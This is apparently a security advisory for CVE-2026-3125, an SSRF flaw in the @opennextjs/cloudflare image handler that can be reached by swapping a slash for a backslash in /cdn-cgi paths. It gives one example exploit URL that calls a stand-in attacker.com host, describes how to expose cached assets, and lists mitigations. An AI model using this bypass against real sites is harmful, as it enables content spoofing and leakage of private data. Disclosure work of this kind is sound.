CVE-2026-3125 is a Server-Side Request Forgery (SSRF) vulnerability identified in the @opennextjs/cloudflare package, specifically within the /cdn-cgi/image/ handler. This handler is intended for development use only, as Cloudflare's edge normally intercepts requests to /cdn-cgi/image/ in production environments, preventing them from reaching the Worker. However, the vulnerability arises from a path normalization bypass: by replacing the forward slash '/' with a backslash '\' in the URL path (e.g., /cdn-cgi\image/ instead of /cdn-cgi/image/), the Cloudflare edge fails to intercept the request. The JavaScript URL class then normalizes the backslash back to a forward slash, causing the request to be processed by the Worker. This results in an unvalidated fetch of arbitrary remote URLs controlled by the attacker. For example, an attacker can craft a URL such as https://victim-site.com/cdn-cgi\image/aaaa/https://attacker.com, causing the victim site to fetch and serve content from attacker.com under its own domain. This violates the same-origin policy and can mislead users or downstream services relying on the victim domain. Additionally, a similar bypass affects Cloudflare Workers with Assets and Cloudflare Pages, where assets stored under /cdn-cgi/ paths are normally inaccessible publicly. Using the backslash bypass, these assets become accessible, potentially exposing private data such as incremental cache files stored under /cdn-cgi/_next_cache in Open Next projects. The vulnerability requires HTTP clients that preserve backslashes in paths (e.g., curl with --path-as-is), as browsers normalize backslashes to forward slashes before sending requests, preventing exploitation via typical browser usage. No known exploits have been reported in the wild at this time. The CVSS 4.0 score of 7.7 reflects a high severity due to network attack vector, no required privileges or user interaction, and partial impact on confidentiality and integrity. The vulnerability is categorized under CWE-918 (SSRF) and CWE-706 (Use of Incorrectly-Resolved Name or Reference).

The primary impact of CVE-2026-3125 is the ability for attackers to perform SSRF attacks that allow them to make the victim's server fetch arbitrary remote URLs. This can lead to several security issues: bypassing same-origin policy protections, enabling phishing or content spoofing by serving attacker-controlled content under the victim's domain, and potentially facilitating further attacks such as credential theft or session hijacking. Additionally, the exposure of private assets stored under normally protected /cdn-cgi/ paths can lead to leakage of sensitive data, including incremental cache data that may contain application state or user information. Organizations using the @opennextjs/cloudflare package, Cloudflare Workers with Assets, or Cloudflare Pages are at risk of data exposure and trust violations. The vulnerability does not require authentication or user interaction, increasing the risk of automated exploitation. Although no known exploits are reported yet, the ease of exploitation with common HTTP clients and the high impact on confidentiality and integrity make this a significant threat. The scope includes all deployments using the vulnerable package and configurations that rely on Cloudflare's edge interception for security. This can affect web applications, APIs, and static asset hosting that utilize these technologies, potentially impacting user trust and regulatory compliance.

To mitigate CVE-2026-3125, organizations should immediately audit their use of the @opennextjs/cloudflare package and Cloudflare Workers or Pages that serve content under /cdn-cgi/ paths. Specific recommendations include: 1) Disable or remove the /cdn-cgi/image/ handler in production environments, ensuring it is only used in development where edge interception is not relied upon. 2) Implement strict input validation and sanitization on URL paths to reject or normalize backslashes before processing, preventing path normalization bypasses. 3) Configure Cloudflare edge rules or firewall policies to detect and block requests containing backslashes in paths, especially those targeting /cdn-cgi/ endpoints. 4) Review and restrict access permissions to assets stored under /cdn-cgi/ paths, ensuring sensitive cache or private data is not exposed. 5) Monitor logs for unusual requests containing backslashes or unexpected fetches initiated by Workers. 6) Update to patched versions of the @opennextjs/cloudflare package once available, or apply vendor-provided fixes. 7) Educate developers about the risks of relying solely on edge interception for security and encourage defense-in-depth strategies. 8) For critical environments, consider implementing network-level egress controls to limit outbound fetches initiated by Workers to trusted domains only. These targeted mitigations go beyond generic advice by focusing on the specific bypass vector and the unique Cloudflare environment.